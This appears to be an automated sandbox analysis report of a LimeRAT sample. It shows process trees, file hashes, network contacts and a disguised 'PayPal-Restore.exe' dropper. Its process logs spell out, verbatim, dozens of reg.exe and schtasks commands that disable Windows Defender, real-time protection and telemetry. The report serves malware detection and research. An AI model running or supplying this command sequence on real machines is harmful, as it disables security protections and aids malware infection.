Analysis Overview
SHA256
8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac
Threat Level: Known bad
The file 8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac was found to be: Known bad.
Malicious Activity Summary
LimeRAT
Executes dropped EXE
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-05-24 13:43
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-05-24 13:43
Reported
2022-05-24 13:51
Platform
win7-20220414-en
Max time kernel
4s
Max time network
142s
Command Line
Signatures
LimeRAT
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe | N/A |
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe
"C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe"
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe
PayPal-Restore.exe -dC:\Users\Admin\AppData\Local\Temp
C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\opener.bat" "
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\234A.tmp\234B.tmp\234C.bat C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"
Network
| Country | Destination | Domain | Proto |
| US | 93.184.220.29:80 | tcp | |
| US | 93.184.220.29:80 | tcp | |
| CN | 101.226.28.203:80 | tcp | |
| US | 93.184.220.29:80 | tcp | |
| CN | 101.226.28.184:80 | tcp | |
| US | 204.79.197.200:443 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | magicbox3317.ddns.net | udp |
Files
memory/532-54-0x0000000075711000-0x0000000075713000-memory.dmp
\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe
| MD5 | 2b9eee13a0e979e7cce3cbd274386be9 |
| SHA1 | f7ac238066df9d83add932190055185a59d015d2 |
| SHA256 | 2b552c6f59b52970e7c86ebe757293d57af3a1f5260b52744773edb5772e0576 |
| SHA512 | 038caa0f92a17f8e9b3c56cc8afcde172703f28e0f0eb76a81cacc89290055f0343b1d6d1cb777e4673550bd4f5cc8ca9a8e4bc8bd32c9bb10d47bb2767cc0ed |
C:\Users\Admin\AppData\Local\Temp\234A.tmp\234B.tmp\234C.bat
| MD5 | 8760b15c6d12ecc70594fc8db876c68c |
| SHA1 | b1d47a27bf45db9955f07c773a5a334e3b528a97 |
| SHA256 | 9a3d9f84626d1443b0e1fc1afe22cc4045c20714b98838e94542991039cf8463 |
| SHA512 | 0463204ebabf6465ba3be44b31dc235ba240f1899b41336655a3f361932b8225326d8ab7c53130d4ded9412193d5967f805221212b964d6a54492d0f2c331dee |
memory/2020-65-0x0000000000000000-mapping.dmp
memory/2044-68-0x0000000000000000-mapping.dmp
memory/1628-71-0x0000000000000000-mapping.dmp
memory/1156-74-0x0000000000000000-mapping.dmp
memory/1684-78-0x0000000000000000-mapping.dmp
memory/688-79-0x0000000000000000-mapping.dmp
memory/1964-81-0x0000000000000000-mapping.dmp
memory/1772-83-0x0000000000000000-mapping.dmp
memory/1508-86-0x0000000000000000-mapping.dmp
memory/1960-89-0x0000000000000000-mapping.dmp
memory/1616-92-0x0000000000000000-mapping.dmp
memory/2028-91-0x0000000000000000-mapping.dmp
memory/1932-93-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\opener.bat
| MD5 | 76b34b8a915e15e32871820b24a60556 |
| SHA1 | aabf1487a5dc1880d5c8a6979666b215dc09a837 |
| SHA256 | ff8a34a62c2f4b7b5c058f67cfbbe5df9e74541f909a3b7f8c9fc8155b72d7a1 |
| SHA512 | 2c0d801537d7576ab03b1eda1b0c60eb41525b4bd57b1a77a383b83dd49d20327b16162c7721c0e7b635734f6d96ffa4290dafc6350917ffa7114780d1716ffb |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe
| MD5 | 9f150fdb9779485a9b4af5875a48aaf7 |
| SHA1 | 47e2d38e7c69a8e7f0e2993f3f8cb131483aa97f |
| SHA256 | 981c27f97402dab365ed009cff2ab23946424a8f0b1d31f080c1e8675434434a |
| SHA512 | b4e94b127f75afb8fcc3d9555ecc608141b27e81755d3b9ffe0ef8632a7594806564f3e5a6dbbc2869b77c11d4570afc7b167440bcdf6f49934f2b4dbb4357df |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe
| MD5 | 9f150fdb9779485a9b4af5875a48aaf7 |
| SHA1 | 47e2d38e7c69a8e7f0e2993f3f8cb131483aa97f |
| SHA256 | 981c27f97402dab365ed009cff2ab23946424a8f0b1d31f080c1e8675434434a |
| SHA512 | b4e94b127f75afb8fcc3d9555ecc608141b27e81755d3b9ffe0ef8632a7594806564f3e5a6dbbc2869b77c11d4570afc7b167440bcdf6f49934f2b4dbb4357df |
memory/588-97-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe
| MD5 | 9f150fdb9779485a9b4af5875a48aaf7 |
| SHA1 | 47e2d38e7c69a8e7f0e2993f3f8cb131483aa97f |
| SHA256 | 981c27f97402dab365ed009cff2ab23946424a8f0b1d31f080c1e8675434434a |
| SHA512 | b4e94b127f75afb8fcc3d9555ecc608141b27e81755d3b9ffe0ef8632a7594806564f3e5a6dbbc2869b77c11d4570afc7b167440bcdf6f49934f2b4dbb4357df |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe
| MD5 | 54a1574cacf95b6c5c9c597d8d76de45 |
| SHA1 | 4879d75f50d747a400c03ab9700e816ec0607fe6 |
| SHA256 | 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1 |
| SHA512 | 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe
| MD5 | 54a1574cacf95b6c5c9c597d8d76de45 |
| SHA1 | 4879d75f50d747a400c03ab9700e816ec0607fe6 |
| SHA256 | 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1 |
| SHA512 | 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f |
memory/904-104-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe
| MD5 | 54a1574cacf95b6c5c9c597d8d76de45 |
| SHA1 | 4879d75f50d747a400c03ab9700e816ec0607fe6 |
| SHA256 | 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1 |
| SHA512 | 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f |
\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe
| MD5 | 54a1574cacf95b6c5c9c597d8d76de45 |
| SHA1 | 4879d75f50d747a400c03ab9700e816ec0607fe6 |
| SHA256 | 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1 |
| SHA512 | 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f |
memory/904-107-0x0000000000940000-0x000000000095A000-memory.dmp
\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe
| MD5 | 54a1574cacf95b6c5c9c597d8d76de45 |
| SHA1 | 4879d75f50d747a400c03ab9700e816ec0607fe6 |
| SHA256 | 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1 |
| SHA512 | 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f |
\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe
| MD5 | 54a1574cacf95b6c5c9c597d8d76de45 |
| SHA1 | 4879d75f50d747a400c03ab9700e816ec0607fe6 |
| SHA256 | 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1 |
| SHA512 | 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f |
memory/1000-90-0x0000000000000000-mapping.dmp
memory/432-88-0x0000000000000000-mapping.dmp
memory/1596-87-0x0000000000000000-mapping.dmp
memory/1468-85-0x0000000000000000-mapping.dmp
memory/1812-84-0x0000000000000000-mapping.dmp
memory/1992-82-0x0000000000000000-mapping.dmp
memory/452-80-0x0000000000000000-mapping.dmp
memory/944-77-0x0000000000000000-mapping.dmp
memory/1732-76-0x0000000000000000-mapping.dmp
memory/1736-75-0x0000000000000000-mapping.dmp
memory/1196-73-0x0000000000000000-mapping.dmp
memory/1740-72-0x0000000000000000-mapping.dmp
memory/676-70-0x0000000000000000-mapping.dmp
memory/564-69-0x0000000000000000-mapping.dmp
memory/1008-67-0x0000000000000000-mapping.dmp
memory/2036-66-0x0000000000000000-mapping.dmp
memory/1272-64-0x0000000000000000-mapping.dmp
memory/1792-63-0x0000000000000000-mapping.dmp
memory/1408-61-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe
| MD5 | b644afe28f2368af7da90246d13bce4a |
| SHA1 | cd24a837643a47a240c7402592f47ba2e4a978b0 |
| SHA256 | e522c2e61f111716eb1b89ab6daf113c9537464f3dafc89a111e60bf6f1d84e5 |
| SHA512 | 1dd0e33a4bceb3811565fc503e5d12c9bfa0f6687b94ad3232af1cd4bd092ea4759b0d82b3728f1ef203cd902ec1d5ac34fda25b167e001270524280f6a96d90 |
memory/952-58-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe
| MD5 | fe4788726b2255e2aa33654f90e7f731 |
| SHA1 | da0181a736a57f57022d241e58fc6f4c25cec755 |
| SHA256 | 9b0889135e08318e0f310913bac7ef86ed1af884ec460c11a66c7190195961a9 |
| SHA512 | 550c50506d5adcfdf22d9c4252e8ad35ccd6eadb02a18185dd2fb7edab57a5e49c99d87ce5c7b9127d94131a71d513481cf0badd36630ed2c3e3ae6743429f33 |
\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe
| MD5 | 31120f8f17f419583be650465cde8f50 |
| SHA1 | fe3ea43bb6b214d4e8e32f879811f6a7016d57e5 |
| SHA256 | a7b1756b3578853214a128219c0c005959b39c7105e5eb09b4484caeb877cd61 |
| SHA512 | 6b80e28890aaeb963abe721eb020ab5ea336974a6be563cb9ada5648a4db074895a42f27591429e99a57e402a587699938724a20ef60c232e6bb8475f4bfee80 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-05-24 13:43
Reported
2022-05-24 13:51
Platform
win10v2004-20220414-en
Max time kernel
5s
Max time network
28s
Command Line
Signatures
LimeRAT
Enumerates physical storage devices
Processes
C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe
"C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe
PayPal-Restore.exe -dC:\Users\Admin\AppData\Local\Temp
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\opener.bat" "
C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe"
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\76DA.tmp\76DB.tmp\76DC.bat C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"
Network
| Country | Destination | Domain | Proto |
| US | 93.184.220.29:80 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe
| MD5 | 086890d750b486ec89ca6e7edd4f2d7c |
| SHA1 | 5f393c2eac56b2ebf0b985e9ac065c7c5e515a7b |
| SHA256 | 3d942d2daecb968356ee3886589b37cb8263bcd046fb092021a0c5631a0877d1 |
| SHA512 | 33d99d82ebe57a3e59514a3caef72ff0e91890e8e45a3f1ae715fc7fe7134679f2e8fa178c8c1ef898460beace5408f4caf2955e325e93aa7ccd0b296c4289bf |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe
| MD5 | 086890d750b486ec89ca6e7edd4f2d7c |
| SHA1 | 5f393c2eac56b2ebf0b985e9ac065c7c5e515a7b |
| SHA256 | 3d942d2daecb968356ee3886589b37cb8263bcd046fb092021a0c5631a0877d1 |
| SHA512 | 33d99d82ebe57a3e59514a3caef72ff0e91890e8e45a3f1ae715fc7fe7134679f2e8fa178c8c1ef898460beace5408f4caf2955e325e93aa7ccd0b296c4289bf |
memory/3204-133-0x0000000000000000-mapping.dmp
memory/1268-135-0x0000000000000000-mapping.dmp
memory/4276-138-0x0000000000000000-mapping.dmp
memory/4012-143-0x0000000000000000-mapping.dmp
memory/1672-153-0x0000000000000000-mapping.dmp
memory/776-156-0x0000000000000000-mapping.dmp
memory/2352-158-0x0000000000000000-mapping.dmp
memory/736-161-0x0000000000000000-mapping.dmp
memory/232-165-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\opener.bat
| MD5 | 76b34b8a915e15e32871820b24a60556 |
| SHA1 | aabf1487a5dc1880d5c8a6979666b215dc09a837 |
| SHA256 | ff8a34a62c2f4b7b5c058f67cfbbe5df9e74541f909a3b7f8c9fc8155b72d7a1 |
| SHA512 | 2c0d801537d7576ab03b1eda1b0c60eb41525b4bd57b1a77a383b83dd49d20327b16162c7721c0e7b635734f6d96ffa4290dafc6350917ffa7114780d1716ffb |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe
| MD5 | 9f150fdb9779485a9b4af5875a48aaf7 |
| SHA1 | 47e2d38e7c69a8e7f0e2993f3f8cb131483aa97f |
| SHA256 | 981c27f97402dab365ed009cff2ab23946424a8f0b1d31f080c1e8675434434a |
| SHA512 | b4e94b127f75afb8fcc3d9555ecc608141b27e81755d3b9ffe0ef8632a7594806564f3e5a6dbbc2869b77c11d4570afc7b167440bcdf6f49934f2b4dbb4357df |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe
| MD5 | 9f150fdb9779485a9b4af5875a48aaf7 |
| SHA1 | 47e2d38e7c69a8e7f0e2993f3f8cb131483aa97f |
| SHA256 | 981c27f97402dab365ed009cff2ab23946424a8f0b1d31f080c1e8675434434a |
| SHA512 | b4e94b127f75afb8fcc3d9555ecc608141b27e81755d3b9ffe0ef8632a7594806564f3e5a6dbbc2869b77c11d4570afc7b167440bcdf6f49934f2b4dbb4357df |
memory/392-167-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe
| MD5 | 54a1574cacf95b6c5c9c597d8d76de45 |
| SHA1 | 4879d75f50d747a400c03ab9700e816ec0607fe6 |
| SHA256 | 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1 |
| SHA512 | 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f |
memory/2952-170-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe
| MD5 | 54a1574cacf95b6c5c9c597d8d76de45 |
| SHA1 | 4879d75f50d747a400c03ab9700e816ec0607fe6 |
| SHA256 | 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1 |
| SHA512 | 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f |
memory/324-164-0x0000000000000000-mapping.dmp
memory/2952-173-0x0000000000010000-0x000000000002A000-memory.dmp
memory/2952-174-0x0000000004960000-0x00000000049FC000-memory.dmp
memory/2684-163-0x0000000000000000-mapping.dmp
memory/2844-162-0x0000000000000000-mapping.dmp
memory/2584-160-0x0000000000000000-mapping.dmp
memory/4164-159-0x0000000000000000-mapping.dmp
memory/4392-157-0x0000000000000000-mapping.dmp
memory/4712-155-0x0000000000000000-mapping.dmp
memory/4968-154-0x0000000000000000-mapping.dmp
memory/3772-152-0x0000000000000000-mapping.dmp
memory/5104-151-0x0000000000000000-mapping.dmp
memory/4516-150-0x0000000000000000-mapping.dmp
memory/2036-149-0x0000000000000000-mapping.dmp
memory/1732-148-0x0000000000000000-mapping.dmp
memory/1348-147-0x0000000000000000-mapping.dmp
memory/552-146-0x0000000000000000-mapping.dmp
memory/2164-145-0x0000000000000000-mapping.dmp
memory/2172-144-0x0000000000000000-mapping.dmp
memory/4140-142-0x0000000000000000-mapping.dmp
memory/3592-141-0x0000000000000000-mapping.dmp
memory/4224-140-0x0000000000000000-mapping.dmp
memory/4260-139-0x0000000000000000-mapping.dmp
memory/4884-137-0x0000000000000000-mapping.dmp
memory/3404-136-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\76DA.tmp\76DB.tmp\76DC.bat
| MD5 | 8760b15c6d12ecc70594fc8db876c68c |
| SHA1 | b1d47a27bf45db9955f07c773a5a334e3b528a97 |
| SHA256 | 9a3d9f84626d1443b0e1fc1afe22cc4045c20714b98838e94542991039cf8463 |
| SHA512 | 0463204ebabf6465ba3be44b31dc235ba240f1899b41336655a3f361932b8225326d8ab7c53130d4ded9412193d5967f805221212b964d6a54492d0f2c331dee |
memory/4912-130-0x0000000000000000-mapping.dmp
memory/2952-175-0x0000000004A00000-0x0000000004A66000-memory.dmp
memory/2952-176-0x0000000005630000-0x0000000005BD4000-memory.dmp
memory/2952-177-0x0000000005F00000-0x0000000005F92000-memory.dmp